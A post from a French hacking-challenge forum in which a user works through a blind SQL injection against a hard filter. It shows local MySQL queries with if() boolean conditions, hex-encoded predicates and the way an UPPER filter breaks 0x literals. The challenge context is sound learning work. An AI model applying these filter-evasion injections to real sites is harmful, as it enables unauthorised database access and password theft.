• STATISTIQUES
  • Il y a eu un total de 0 membres et 22043 visiteurs sur le site dans les dernières 24h pour un total de 22 043 personnes!
    Membres: 2 605
    Discussions: 3 579
    Messages: 32 816
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [EN] Bright Shadows
    JavaScript: 13, Exploit: 27, Crypto: 69, CrackIt: 52, Stegano: 67, Flash: 3, Programming: 16, Java-Applet: 10, Logic: 20...
    Challenges
    [FR] Root-me
    Script: 5, Système: 20, Cracking: 16, Cryptanalyse: 17, Programmation: 8, Réaliste: 11, Réseau: 10, Stéganog...
    Challenges
    [FR] PHP Débutant
    Apprendre le PHP par l'exemple, facilement et simplement. Réservé d'abord aux débutants....
    Programmation
    [EN] Astalavista
    Un site aux ressources incontournable depuis plusieurs années, Astalavista est réellement devenue un cl...
    Hacking
    [EN] Security Traps
    Site de challenge qui prétend être construit non pas dans le but de parfaire vos connaissances, mais plutôt dan...
    Challenges
    [FR] WeChall
    Audio: 3, Coding: 11, Cracking: 9, Crypto: 18, Encoding: 11, Exploit: 44, Forensics: 1, Fun: 6, HTTP: 6, Image: 8, Java:...
    Challenges
    [EN] Listbrain Version 3
    Site proposant 66 challenges présentés dans une liste mélangée.
    Challenges

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
Injection SQL Hard Filtre
01-09-2012, 17h49
Message : #4
oxame Hors ligne
Newbie
*



Messages : 17
Sujets : 3
Points: 0
Inscription : Jun 2012
RE: Injection SQL Hard Filtre
Salut Luxerails,

Déja merci d'avoir répondu,

J'ai trouvé une injection qui marche :

mysql> select user,password from users WHERE user_id = if((1 = 1),1,0);
+-------+----------------------------------+
| user | password |
+-------+----------------------------------+
| admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+-------+----------------------------------+
1 row in set (0.00 sec)

mysql> select user,password from users WHERE user_id = if((1 = 0),1,0);
Empty set (0.00 sec)

la c'est la copie de la sortie de mon serveur mysql, mais sur l'épreuve j'ai bien un membre existant / membre inconnue.

J'avais (enfin) finis par comprendre que mon UNHEX(CONTCAT(CONV())) était considéré comme une chaine de caractére et non pas comme une commande avec le test suivant :

mysql> SELECT user,HEX(password),HEX(LOWER(CONCAT(CONV([password])))) FROM users WHERE user_id = 1;
+-------+----------------------------------------------------------------------------+------------------------------------------+
| user | HEX(password) | HEX(LOWER(CONCAT(CONV([password])))) |
+-------+----------------------------------------------------------------------------+------------------------------------------+
| admin | 3566346463633362356161373635643631643833323764656238383263663939 | 307837303631373337333737366637323634 |
+-------+-----------------------------------+-----------------------------------------------------------------------------------+
1 row in set (0.00 sec)

J'avais trouvé sur ton site l'idée d'utilisé directement l'instruction en Hexa :
"LENGTH(password) = 32" => 0x4c454e4754482870617373776f726429203d203332;
ce qui marche en local:

mysql> SELECT user FROM users WHERE user_id = if((0x4c454e4754482870617373776f726429203d203332),1,0);
+-------+
| user |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)

mais le UPPER du code PHP transforme le 0x en 0X et n'est donc plus interprété comme une instruction en hexa, j'ai pensé a faire un LOWER mais toutes les fonction sur les chaines de caractère sont filté, c'est pour cela que je m'était rabattu sur les UNHEX(CONTCAT(CONV())).

Donc j'ai la réponse a ma question c'est une chaine de caractère qui n'est pas interprété, quand j'aurais éliminé tout ce qui ne marche pas il ne resteras que la solution. Wink
+1 (0) -1 (0) Répondre


Messages dans ce sujet
Injection SQL Hard Filtre - par oxame - 31-08-2012, 18h20
RE: Injection SQL Hard Filtre - par oxame - 01-09-2012, 08h03
RE: Injection SQL Hard Filtre - par Luxerails - 01-09-2012, 14h08
RE: Injection SQL Hard Filtre - par oxame - 01-09-2012, 17h49
RE: Injection SQL Hard Filtre - par Luxerails - 01-09-2012, 17h59

Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  Injection SQL acip 12 747 28-07-2013, 20h30
Dernier message: gruik

Atteindre :


Utilisateur(s) parcourant ce sujet : 4 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut